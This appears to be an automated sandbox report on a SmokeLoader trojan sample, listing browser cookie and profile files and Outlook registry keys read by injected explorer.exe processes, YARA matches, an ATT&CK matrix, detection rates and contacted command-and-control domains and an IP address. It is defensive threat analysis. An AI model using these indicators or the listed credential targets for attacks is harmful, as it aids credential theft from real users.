                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\7d12ac42-15c3-4db9-abfe-259bc8d249acJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\15f01145-7764-450b-9ad5-323693350a9cJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\previous.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857833.45e26519-596d-41a5-b290-e547b44111fd.health.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.a73949a2-5a70-4025-8008-88156c16bb4a.event.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\state.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a7174184-f177-48c4-876a-8a51c2ed8fbcJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829737.9f7a5e7a-2be0-4ff7-b132-b1f6e59a8e58.event.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834608.65054280-9d54-477d-a3ea-afcb1f88e001.health.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\eventsJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\session-state.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\05d02ac8-b2f1-4670-8541-db8ec2bbf427Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857869.95af30ae-acac-4802-b983-233d7fd3cf34.main.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txtJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\3a40aaf9-3f8b-43a2-85e8-88e3ffc7666fJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txtJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lockJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\277ffbb3-8e94-4f3f-acac-7a401d130160Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834606.011115ff-9301-40fc-805e-ba07b7fdfce4.event.jsonlz4Jump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7840, type: MEMORYSTR
                    Source: Yara matchFile source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.2.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\rrrrcve, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution                    		Boot or Logon Initialization Scripts513
                    Process Injection                    		3
                    Obfuscated Files or Information                    		11
                    Input Capture                    		3
                    File and Directory Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                    Software Packing                    		1
                    Credentials in Registry                    		16
                    System Information Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    DLL Side-Loading                    		NTDS531
                    Security Software Discovery                    		Distributed Component Object Model11
                    Input Capture                    		113
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    File Deletion                    		LSA Secrets12
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials13
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job513
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448294 Sample: 171687721070698e62c2170d003... Startdate: 28/05/2024 Architecture: WINDOWS Score: 100 34 prolinice.ga 2->34 46 Snort IDS alert for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 8 other signatures 2->52 9 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe 2->9         started        12 rrrrcve 2->12         started        signatures3 process4 signatures5 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->64 66 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->66 68 Maps a DLL or memory area into another process 9->68 76 2 other signatures 9->76 14 explorer.exe 37 4 9->14 injected 70 Antivirus detection for dropped file 12->70 72 Multi AV Scanner detection for dropped file 12->72 74 Machine Learning detection for dropped file 12->74 process6 dnsIp7 36 prolinice.ga 77.232.129.190, 49736, 49737, 49746 BSTV-ASRU Russian Federation 14->36 30 C:\Users\user\AppData\Roaming\rrrrcve, PE32 14->30 dropped 32 C:\Users\user\...\rrrrcve:Zone.Identifier, ASCII 14->32 dropped 38 Benign windows process drops PE files 14->38 40 Injects code into the Windows Explorer (explorer.exe) 14->40 42 Deletes itself after installation 14->42 44 2 other signatures 14->44 19 explorer.exe 18 14->19         started        22 explorer.exe 14->22         started        24 explorer.exe 14->24         started        26 6 other processes 14->26 file8 signatures9 process10 signatures11 54 System process connects to network (likely due to code injection or exploit) 19->54 56 Found evasive API chain (may stop execution after checking mutex) 19->56 58 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->58 62 3 other signatures 19->62 60 Tries to harvest and steal browser information (history, passwords, etc) 22->60 28 WerFault.exe 21 26->28         started        process12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe55%ReversingLabsWin32.Trojan.SmokeLoader
                    171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe58%VirustotalBrowse
                    171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe100%AviraTR/Crypt.XPACK.Gen
                    171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\rrrrcve100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Roaming\rrrrcve100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\rrrrcve55%ReversingLabsWin32.Trojan.SmokeLoader

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://aka.ms/odirmr0%URL Reputationsafe
                    http://schemas.mi0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                    https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%URL Reputationsafe
                    https://powerpoint.office.comcember0%URL Reputationsafe
                    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://excel.office.com0%URL Reputationsafe
                    http://schemas.micro0%URL Reputationsafe
                    https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we0%URL Reputationsafe
                    https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi0%URL Reputationsafe
                    https://api.msn.com/q0%URL Reputationsafe
                    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-10%URL Reputationsafe
                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
                    https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A0%URL Reputationsafe
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
                    https://wns.windows.com/L0%URL Reputationsafe
                    https://word.office.com0%URL Reputationsafe
                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent0%URL Reputationsafe
                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%URL Reputationsafe
                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                    http://schemas.micr0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%URL Reputationsafe
                    https://aka.ms/Vh5j3k0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
                    https://api.msn.com/v1/news/Feed/Windows?&0%URL Reputationsafe
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
                    https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
                    https://android.notify.windows.com/iOS0%URL Reputationsafe
                    https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar0%URL Reputationsafe
                    https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
                    https://api.msn.com/0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    http://prolinice.ga/ndex.php0%Avira URL Cloudsafe
                    https://outlook.com_0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
                    https://www.msn.com:443/en-us/feed0%URL Reputationsafe
                    https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%URL Reputationsafe
                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of0%URL Reputationsafe
                    http://vilendar.ga/index.php100%Avira URL Cloudmalware
                    http://prolinice.ga/index.php0%Avira URL Cloudsafe
                    http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    http://prolinice.ga/0%Avira URL Cloudsafe
                    http://prolinice.ga/=0%Avira URL Cloudsafe
                    http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
                    http://prolinice.ga/index.phpMozilla/5.00%Avira URL Cloudsafe
                    http://prolinice.ga:80/index.php0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    prolinice.ga
                    		77.232.129.190
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://prolinice.ga/index.phptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://vilendar.ga/index.phptrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtabexplorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.miexplorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://prolinice.ga/ndex.phpexplorer.exe, 00000006.00000002.1956613264.000000000327F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://excel.office.comexplorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.microexplorer.exe, 00000001.00000000.1727963617.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1728370033.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1729676503.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.msn.com/qexplorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1731083282.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
